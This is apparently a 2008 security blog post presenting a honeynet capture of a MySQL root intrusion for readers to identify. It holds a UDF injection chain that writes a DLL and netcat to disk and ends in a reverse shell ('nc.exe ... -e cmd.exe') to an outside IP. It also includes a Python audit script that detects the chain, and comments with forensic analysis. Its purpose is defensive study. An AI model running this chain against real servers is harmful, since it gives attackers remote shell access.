Wednesday, March 26, 2008

Name that hack

Today my honeynet was the victim of an oldie but goodie. It's time to play "NAME THAT HACK". What do you think is happening here?

A...
5.0.45-community-nt.^!..u"G|_G${.,.................c]+Yba?Ti4d{.
@..........@........................root....'NF.g".|Z/...=ao.nmysql.
...........
.....CREATE DATABASE nmxtmp
...........
.....USE nmxtmp
...........
/....CREATE TABLE cmd (codetab MEDIUMBLOB NOT NULL)
...........
( ...INSERT INTO cmd (codetab) VALUES (
0000100000000000000000000000000000200000602e72646174610000e009 [Truncated by me])
...........
5....SELECT * INTO DUMPFILE '..\\bin\\mycmd.dll' FROM cmd
......."...
?....CREATE FUNCTION cmd_execute RETURNS integer SONAME 'mycmd.dll'
...........
.....DROP TABLE cmd
...........
.....DROP DATABASE nmxtmp
...........
.....FLUSH LOGS
...........
.....CREATE DATABASE nmxtmp
...........
.....USE nmxtmp
...........
/....CREATE TABLE cmd (codetab MEDIUMBLOB NOT NULL)
...........
(....INSERT INTO cmd (codetab) VALUES (
00400000c02e696461746100005c070000002001000008000000e000 [truncated by me])
...........
3....SELECT * INTO DUMPFILE '..\\data\\nc.exe' FROM cmd
......."...
.....DROP TABLE cmd
...........
.....DROP DATABASE nmxtmp
...........
.....FLUSH LOGS
...........
D....SELECT cmd_execute('..\\data\\nc.exe 66.35.111.60 2095 -e cmd.exe')
.....R....def...cmd_execute('..\\data\\nc.exe 66.35.111.60 2095 -e cmd.exe')..?.........................537912269770588160.........
.....


Where would you begin your investigation?
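As an added example that is not part of the original post, the following Python audit walks a MySQL general query log for the chain visible in the capture above: a file written to disk with INTO DUMPFILE (FILE privilege), a CREATE FUNCTION ... SONAME that loads the library the same session just wrote, calls to that UDF, and FLUSH LOGS rotations that would hide the trail. The sample log is constructed from the statements in the session, with the BLOB payload elided.

```python
import re

# Constructed sample: the statements from the captured session above, one per
# line as a MySQL general query log would record them (BLOB payload elided).
SAMPLE_LOG = r"""
CREATE TABLE cmd (codetab MEDIUMBLOB NOT NULL)
INSERT INTO cmd (codetab) VALUES (0x4d5a)
SELECT * INTO DUMPFILE '..\\bin\\mycmd.dll' FROM cmd
CREATE FUNCTION cmd_execute RETURNS integer SONAME 'mycmd.dll'
FLUSH LOGS
SELECT * INTO DUMPFILE '..\\data\\nc.exe' FROM cmd
FLUSH LOGS
SELECT cmd_execute('..\\data\\nc.exe 66.35.111.60 2095 -e cmd.exe')
"""

DUMPFILE_RE = re.compile(r"INTO\s+(?:DUMPFILE|OUTFILE)\s+'([^']+)'", re.I)
SONAME_RE = re.compile(r"CREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+(\w+)\s+RETURNS\s+\w+\s+SONAME\s+'([^']+)'", re.I)
CALL_RE = re.compile(r"\b(\w+)\s*\(\s*'([^']*)'")

def basename(path):
    """Last path component; the log shows Windows paths with doubled backslashes."""
    return re.split(r"[\\/]", path)[-1]

def audit_udf_chain(log_text):
    """Single pass over the log: report files written with DUMPFILE/OUTFILE,
    UDFs registered with SONAME, calls to those UDFs, and the FLUSH LOGS count.
    'linked' is set when a UDF loads a library this same session wrote to disk."""
    report = {"dumped": [], "udfs": {}, "executed": [], "flush_logs": 0, "linked": False}
    for stmt in (s.strip() for s in log_text.splitlines() if s.strip()):
        if m := DUMPFILE_RE.search(stmt):
            report["dumped"].append(m.group(1))
        elif m := SONAME_RE.search(stmt):
            name, lib = m.groups()
            report["udfs"][name] = lib
            if any(basename(p).lower() == basename(lib).lower() for p in report["dumped"]):
                report["linked"] = True
        elif re.match(r"FLUSH\s+LOGS", stmt, re.I):
            report["flush_logs"] += 1  # rotates the very log that records this trail
        else:
            for name, arg in CALL_RE.findall(stmt):
                if name in report["udfs"]:  # a library loaded in this session is being invoked
                    report["executed"].append((name, arg))
    return report
```

On a real system the same logic applies to the binary log or to a packet capture of port 3306, and the 'linked' flag is what separates a legitimate plugin install from this write-then-load sequence.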

3 comments:

Anonymous said...

Looking at the hex values, right up front what jumps out is 0x4d5a, or MZ in ASCII. These look like DOS executable files in hex. Also, these are MySQL commands. Likely MySQL running on a Windows system, or assumed to run on a Windows system. Basically it looks like someone found an open MySQL server with access to the root user, who happens to have the 'FILE' privilege by default, thus the ability to output files.

The first file looks like a command library that'll be used with the cmd_execute function, something like cmd.exe, although from the snippet provided it doesn't match the cmd.exe from XP or Vista.

The second looks like a standard netcat listener that's set to listen on port 2095 and run a command shell. The attacker simply needs to connect to that port via netcat to have a command shell available. If the mycmd.dll allows privilege escalation somehow, then nc.exe will be run as that; otherwise it'll be as SYSTEM or whatever the MySQL server is running as.

I'd check to see if mysql is running on the system. Check to see if the mycmd.dll library exists, or the nc.exe file. See if those processes are running and dump them from memory. Check to see if the function 'cmd_execute' exists in memory.

Mr. Obnibolongo said...

Hi!
I've visited your blog a few times now and I've noticed that though your articles are *very* interesting there aren't many replies/comments. Anyway, I suppose you run a hit counter somewhere (too lazy to check that) but I thought I'd say "personally": THANK YOU for your postings :)

P.S.: I'd have stopped noticing the MySQL stuff :P

Anonymous said...

The 1st post has most of it correct. The netcat command is actually an outbound connection, and when it makes connection it will spawn the cmd.exe.

If the connection was live, the 1st thing I would decide is to either block it, or sniff it to determine what he was doing.

Next I would grab a WFT of the system. Memory analysis could also be helpful if the cmd.exe was the original one spawned. If I remember correctly, you should be able to see the command history.

Lastly, you could start a MAC time analysis and build your case that way if live analysis is a dead end.

Love the blog. Keep up the good work.